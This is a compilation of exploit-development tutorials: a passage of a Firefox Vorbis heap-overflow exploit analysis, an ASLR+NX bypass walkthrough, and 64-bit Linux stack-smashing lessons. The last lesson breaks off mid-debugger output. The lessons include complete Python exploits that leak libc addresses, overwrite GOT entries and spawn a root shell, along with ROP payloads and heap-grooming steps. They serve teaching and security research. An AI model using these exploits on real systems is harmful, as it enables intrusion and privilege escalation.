[residue_classifications] = 6 bits and plus one
[residue_classbook] 8 bits

The residue_classbook field defines which CodeBook will be used when decoding this ResidueBackend.
MapBackend and Mode have no influence on the exploit, so we skip them too.

4. Patch analysis

4.1. Patched Function

From the ZDI blog, we can see the vulnerability is inside the following function:

/* decode vector / dim granularity gaurding is done in the upper layer */
long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n)
{
  if (book->used_entries > 0)
  {
    int i, j, entry;
    float *t;

    if (book->dim > 8)
    {
      for (i = 0; i < n;) {
        entry = decode_packed_entry_number(book, b);
        if (entry == -1) return (-1);
        t = book->valuelist + entry * book->dim;
        for (j = 0; j < book->dim;)
        {
          a[i++] += t[j++];
        }
      }
    }
    else
    {
      // blablabla
    }
  }
  return (0);
}

Inside the first if branch there is a nested loop. The inner loop uses “book->dim” as its bound without any check, and it also advances the variable “i” that belongs to the outer loop. So if book->dim > n, “a[i++] += t[j++]” leads to an out-of-bounds write.

In this function, “a” is one of the arguments, and “t” is calculated from “book->valuelist”.

4.2. Buffer – a

After reading some source code, I found that “a” is initialized in the code below:

    /* alloc pcm passback storage */
    vb->pcmend=ci->blocksizes[vb->W];
    vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
    for(i=0;i<vi->channels;i++)
      vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));

The “vb->pcm[i]” buffer is passed into the vulnerable function as “a”, and its memory chunk is allocated by _vorbis_block_alloc with a size equal to vb->pcmend*sizeof(*vb->pcm[i]).
vb->pcmend comes from ci->blocksizes[vb->W], and ci->blocksizes is defined in the Vorbis Identification Header.
So we can control the size of the memory chunk allocated for “a”.
Digging deeper into _vorbis_block_alloc, we find the call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of “a” lies on the mozJemalloc heap.

4.3. Buffer – t

After reading some more source code, I found that book->valuelist gets its value here:

    c->valuelist=_book_unquantize(s,n,sortindex);

The logic of _book_unquantize can be shown as follows:

float *_book_unquantize(const static_codebook *b, int n, int *sparsemap)
{
  long j, k, count = 0;
  if (b->maptype == 1 || b->maptype == 2)
  {
    int quantvals;
    float mindel = _float32_unpack(b->q_min);
    float delta = _float32_unpack(b->q_delta);
    float *r = _ogg_calloc(n * b->dim, sizeof(*r));

    switch (b->maptype)
    {
      case 1:
        quantvals = _book_maptype1_quantvals(b);

        // do some math work

        break;
      case 2:
        float val = b->quantlist[j * b->dim + k];

        // do some math work

        break;
    }

    return (r);
  }
  return (NULL);
}

So book->valuelist holds the data decoded from the corresponding CodeBook’s VQ data.
It lies on the mozJemalloc heap too.

4.4. Cola Time

So now we can see that when the vulnerability is triggered:

  • a
    • lies on the mozJemalloc heap;
    • has a controllable size.
  • t
    • lies on the mozJemalloc heap too;
    • has controllable contents.
  • book->dim
    • has controllable contents.

Combining all of the above, we can perform a write in the mozJemalloc heap with a controllable offset and controllable content.
But what about the controllable size? How does that help our exploit? Let’s see how mozJemalloc works.

5. mozJemalloc

mozJemalloc is the heap manager Mozilla developed based on jemalloc.
The following global variables give some insight into how mozJemalloc is organized:

  • gArenas
    • mDefaultArena
    • mArenas
    • mPrivateArenas
  • gChunkBySize
  • gChunkByAddress
  • gChunkRTress

In mozJemalloc, memory is divided into chunks, and those chunks are attached to different arenas; an arena manages its chunks. Every user allocation must live inside one of these chunks, and in mozJemalloc a user-allocated block is called a region.
A chunk is divided into runs of different sizes, and each run keeps track of the status of the regions inside it through a bitmap structure.

5.1. Arena

In mozJemalloc, each arena is assigned an id. When the allocator needs to allocate memory, it can use the id to get the corresponding arena.
Inside the arena there is a structure called mBin. It is an array, each element of which is an arena_bin_t object, and each of these objects manages all regions of one size in this arena. Region sizes from 0x10 to 0x800 are managed by mBin.
The runs used by an mBin cannot be guaranteed to be contiguous, so mBin uses a red-black tree to manage its runs.

5.2. Run

The first region inside a run is used to store the run’s management information, and the rest of the regions can be handed out by the allocator. All regions in the same run have the same size.
When allocating a region from a run, the first not-in-use region closest to the run header is returned.

5.3. Arena Partition

In the current code branch of mozilla-central, all JavaScript memory allocations and frees go through the moz_arena_-prefixed functions, and those functions only use the arena with id 1.
In mozJemalloc, an arena may or may not be a PrivateArena, and the arena with id 1 is a PrivateArena. This means the ogg buffer will not be in the same arena as JavaScript objects.
In this situation, we can say the JavaScript arena is isolated from the other arenas.
But the vulnerable Windows Firefox 59.0 does not have a PrivateArena, so we can use JavaScript objects to perform heap feng shui and build an exploit.
I first debugged a Linux opt+debug build of Firefox; because of the arena partitioning it was hard to find a way to write an exploit there, and so far I have only achieved an info leak on Linux.

6. Exploit

In this section, I will show how to build an exploit based on this vulnerability.

6.1. Build Ogg file

First of all, we need to build an Ogg file that can trigger the vulnerability. Part of the PoC Ogg file data is shown below:

Pic.4 PoC Ogg file partial data
We can see codebook->dim is equal to 0x48.

6.2. Heap Spray

First we allocate a lot of JavaScript arrays. This exhausts all usable memory regions in mBin, so mozJemalloc has to map new memory and divide it into runs for mBin.
Then we free those arrays in an interleaved fashion, leaving many holes inside mBin. But since we can never know the original layout of mBin, and other objects or threads may be using mBin while we free the arrays, the holes may not actually be interleaved.
If the holes are not interleaved, our ogg buffer may be allocated in a contiguous hole, and in that situation we cannot control much of the data.
To avoid this, after the interleaved free we make some compensating allocations in mBin so that the ogg buffer is allocated in a hole right before an array.

6.3. Modify Array Length

After the heap spray, we can use _ogg_malloc to allocate a region in the mozJemalloc heap.
So we can force a memory layout like the following:

|———————contiguous memory —————————|
[ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ]

When we trigger the out-of-bounds write, we can modify one of the arrays’ length, giving us an array object in mozJemalloc that can read out of bounds.
Then we allocate many ArrayBuffer objects in mozJemalloc, and the memory layout turns into the following:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ]

In this situation, we can use Array_length_modified to read/write ArrayBuffer_contents.
Finally, memory will look like this:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ]

6.4. Cola time again

Now we control those objects, and we can do the following:

  • Array_length_modified
    • Out-of-bound write
    • Out-of-bound read
  • ArrayBuffer_contents_modified
    • In-bound write
    • In-bound read

If we try to leak memory data through Array_length_modified, we will read “NaN” from memory, because SpiderMonkey uses tagged values.
But if we use Array_length_modified to write something into ArrayBuffer_contents_modified and then read it back through ArrayBuffer_contents_modified, we can leak a JavaScript object pointer from memory.

6.5. Fake JSObject

We can fake a JSObject in memory by leaking some pointers and writing them into a JavaScript object, and we can then write to an address through this fake object. (Turning off the baseline JIT will help you see what is going on; the following content assumes the baseline JIT is disabled.)

Pic.5 Fake JavaScript Object

If we allocate two ArrayBuffers of the same size, they will be contiguous in memory inside the JS::Nursery heap. The memory layout will look like the following:

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

Using the fake-object trick, we can change the first ArrayBuffer’s metadata to make SpiderMonkey think it covers the second ArrayBuffer.

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

We can now read and write arbitrary memory.
After this, all you need is a ROP chain to get Firefox to your shellcode.

6.6. Pop Calc?

Finally we reach our shellcode; the process context is as follows:

Pic.6 achieve shellcode
The corresponding memory chunk information is as follows:

Pic.7 memory address information

But Firefox releases have the sandbox enabled by default, so if you try to pop calc through CreateProcess, the sandbox will block it.

7. Related code and works

  1. Firefox Source Code
  2. OR’LYEH? The Shadow over Firefox by argp
  3. Exploiting the jemalloc Memory Allocator: Owning Firefox’s Heap by argp,haku
  4. QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi

 

Bypass ASLR+NX Part 1

Hi guys, today I will explain how to bypass the ASLR and NX mitigation techniques. If you don’t have any knowledge about ASLR and NX, you can read about them at the link above; I will explain them here, but not in depth.

ASLR (Address Space Layout Randomization): a mitigation technique that prevents exploitation by randomizing addresses instead of keeping them fixed. As we saw in the basic buffer overflow exploit, you need to put the start of the buffer into EIP and redirect execution to your shellcode; when addresses are random, it becomes hard to guess where the buffer starts. Randomization is not only applied to shared library addresses: we also find ASLR in stack and heap addresses.

NX (Non-Executable): another mitigation, used to prevent memory from executing machine code (shellcode). As we saw in the basic buffer overflow, you put shellcode on the stack and redirect EIP to the beginning of the buffer to execute it, but that will not work here. This mitigation can be bypassed with the ret2libc technique, which reuses functions inside the binary or libc and passes their arguments on the stack. There is also another way that depends on gadgets inside the binary or a shared library; this technique is Return Oriented Programming (ROP), and I will cover it in a separate article.

Now that we have a little info about ASLR and NX, it’s time to see how we can bypass them. There are many ways to bypass ASLR, for example ret2plt: the Procedure Linkage Table contains a stub for each global function, and a call instruction in the text segment doesn’t call the function directly, it calls the stub (func@PLT) instead. We return into the PLT because it is not randomized; its address is known before execution. Other techniques are overwriting the GOT, and brute-forcing, which is used when the address is only partially randomized (only 2 or 3 bytes are random).

In this article I will explain a technique that combines ret2plt, some ROP gadgets, and ret2libc. Let’s break it down.
First, find the PLT entries.

vulnerable code
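
The vulnerable program isn’t reproduced here, but for this walkthrough it is essentially an unchecked copy into a stack buffer, along these lines (names and the buffer size are illustrative; the pattern offset of 1028 found below depends on the real binary):

#include <string.h>

/* built as a 32-bit binary without stack protection, e.g.
   gcc -m32 -fno-stack-protector vuln.c -o vuln */
int main(int argc, char *argv[]) {
    char buf[1024];
    if (argc > 1)
        strcpy(buf, argv[1]);   /* no length check: overflows saved EBP/EIP */
    return 0;
}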

We compile it with the following flags:

Now let’s check that ASLR is enabled:

As you can see in the image above, libc is randomized, but it could be brute-forced.

Now let’s open the file in gdb.

Now it’s clear that NX is enabled. Let’s start fuzzing the binary.

We create a pattern and pass it to the binary to detect where the overflow occurs.

Now we can see the pattern in EIP; we use another tool to find where the overflow occurred.

It takes 1028 bytes to overwrite EBP; if we add 4 more bytes we control EIP and can redirect our execution.

Now we have control of EIP.

OK, after the basic overflow steps we need a way to bypass ASLR+NX.

First, find the functions’ PLT entries in the binary file.

We find the strcpy and system PLT entries; our exploit will be built on just these two functions.
Second, we must find a writable section in the binary file to fill, and then use system like we did in a traditional ret2libc.

The first thing that comes to mind is the .bss section: it is used by compilers and linkers for the part of the data segment containing statically allocated variables that are not initialized.

After that we will use strcpy to write a string to the .bss address, but copied from what address?
Let’s go back to the functions we found in the PLT: strcpy will be used to write the string and system to execute the command, but we can’t find “/bin/sh” in the binary file, so another approach is to look for the individual characters inside the binary itself.

Now we have the string addresses; it’s time to combine all the pieces we found.

1 - Use strcpy to copy from SRC to DEST. SRC in this case is our string «sh» and DEST is our writable area «.bss». But to chain the two calls, strcpy and system, we need gadgets matching the number of parameters; in this case we just need a pop pop ret.

We chose 0x080484ba; the register names don’t matter, we just need two pops.
2 - After we write the string, we use system like we did in ret2libc, but in this case «/bin/sh» will be the .bss address.

final payload

strcpy+ppr+.bss+s
strcpy+ppr+.bss+1+h
system+dump+.bss

Final Exploit

We got a shell. Sometimes you need to chain several techniques to build the final exploit and bypass more than one mitigation.

64-bit Linux stack smashing tutorial: Part 3

It’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.

Setup

The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;
}

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    vuln();
    return 0;
}

You can compile it yourself, or download the precompiled binary here.

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is the difference between memset()’s address, and memset()’s offset from libc.so.6.
  3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
.
.
.
gdb-peda$ c
Continuing.

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive its address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to set up a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True: 
    s.recv(1024)

Let’s see it in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is at 0x8c5c0. Subtracting this from the leaked memset()’s address will give us libc’s base address.

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

And here it is in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to system().

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # junk
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop rdi; ret
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh")

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-privileged user:

koji@pwnbox:/root/work$ whoami
koji
koji@pwnbox:/root/work$ ./poc.py
Enter input:
Recv:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'
whoami
root

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.

64-bit Linux stack smashing tutorial: Part 2

This is part 2 of my 64-bit Linux Stack Smashing tutorial. In part 1 we exploited a 64-bit binary using a classic stack overflow and learned that we can’t just blindly expect to overwrite RIP by spamming the buffer with bytes. We turned off ASLR, NX, and stack canaries in part 1 so we could focus on the exploitation rather than bypassing these security features. This time we’ll enable NX and look at how we can exploit the same binary using ret2libc.

Setup

The setup is identical to what I was using in part 1. We’ll also be making use of the following:

Ret2Libc

Here’s the same binary we exploited in part 1. The only difference is we’ll keep NX enabled which will prevent our previous exploit from working since the stack is now non-executable:

/* Compile: gcc -fno-stack-protector ret2libc.c -o ret2libc      */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space     */

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

In 32-bit binaries, a ret2libc attack involves setting up a fake stack frame so that the function calls a function in libc and passes it any parameters it needs. Typically this would be returning to system() and having it execute “/bin/sh”.

In 64-bit binaries, function parameters are passed in registers, therefore there’s no need to fake a stack frame. The first six parameters are passed in registers RDI, RSI, RDX, RCX, R8, and R9. Anything beyond that is passed in the stack. This means that before returning to our function of choice in libc, we need to make sure the registers are setup correctly with the parameters the function is expecting. This in turn leads us to having to use a bit of Return Oriented Programming (ROP). If you’re not familiar with ROP, don’t worry, we won’t be going into the crazy stuff.

We’ll start with a simple exploit that returns to system() and executes “/bin/sh”. We need a few things:

  • The address of system(). ASLR is disabled so we don’t have to worry about this address changing.
  • A pointer to “/bin/sh”.
  • Since the first function parameter needs to be in RDI, we need a ROP gadget that will copy the pointer to “/bin/sh” into RDI.

Let’s start with finding the address of system(). This is easily done within gdb:

gdb-peda$ start
.
.
.
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x7ffff7a5ac40 <system>

We can just as easily search for a pointer to “/bin/sh”:

gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
ret2libc : 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
ret2libc : 0x6006ff --> 0x68732f6e69622f ('/bin/sh')
    libc : 0x7ffff7b9209b --> 0x68732f6e69622f ('/bin/sh')

The first two pointers are from the string in the binary that prints out “Try to exec /bin/sh”. The third is from libc itself, and in fact if you do have access to libc, then feel free to use it. In this case, we’ll go with the first one at 0x4006ff.

Now we need a gadget that copies 0x4006ff to RDI. We can search for one using ropper. Let’s see if we can find any instructions that use EDI or RDI:

koji@pwnbox:~/ret2libc$ ropper --file ret2libc --search "% ?di"
Gadgets
=======


0x0000000000400520: mov edi, 0x601050; jmp rax;
0x000000000040051f: pop rbp; mov edi, 0x601050; jmp rax;
0x00000000004006a3: pop rdi; ret ;

3 gadgets found

The third gadget that pops a value off the stack into RDI is perfect. We now have everything we need to construct our exploit:

#!/usr/bin/env python

from struct import *

buf = ""
buf += "A"*104                              # junk
buf += pack("<Q", 0x00000000004006a3)       # pop rdi; ret;
buf += pack("<Q", 0x4006ff)                 # pointer to "/bin/sh" gets popped into rdi
buf += pack("<Q", 0x7ffff7a5ac40)           # address of system()

f = open("in.txt", "w")
f.write(buf)

This exploit will write our payload into in.txt which we can redirect into the binary within gdb. Let’s go over it quickly:

  • Line 7: We overwrite RIP with the address of our ROP gadget so when vuln() returns, it executes pop rdi; ret.
  • Line 8: This value is popped into RDI when pop rdi is executed. Once that’s done, RSP will be pointing to 0x7ffff7a5ac40; the address of system().
  • Line 9: When ret executes after pop rdi, execution returns to system(). system() will look at RDI for the parameter it expects and execute it. In this case, it executes “/bin/sh”.

Let’s see it in action in gdb. We’ll set a breakpoint at vuln()’s return instruction:

gdb-peda$ br *vuln+73
Breakpoint 1 at 0x40060f

Now we’ll redirect the payload into the binary and it should hit our first breakpoint:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
.
.
.
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 --> 0x4006a3 (<__libc_csu_init+99>:    pop    rdi)
0008| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0024| 0x7fffffffe520 --> 0x0
0032| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0040| 0x7fffffffe530 --> 0x0
0048| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0056| 0x7fffffffe540 --> 0x100000000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x000000000040060f in vuln ()

Notice that RSP points to 0x4006a3 which is our ROP gadget. Step in and we’ll return to our gadget where we can now execute pop rdi.

gdb-peda$ si
.
.
.
[-------------------------------------code-------------------------------------]
=> 0x4006a3 <__libc_csu_init+99>:   pop    rdi
   0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0008| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0016| 0x7fffffffe520 --> 0x0
0024| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0032| 0x7fffffffe530 --> 0x0
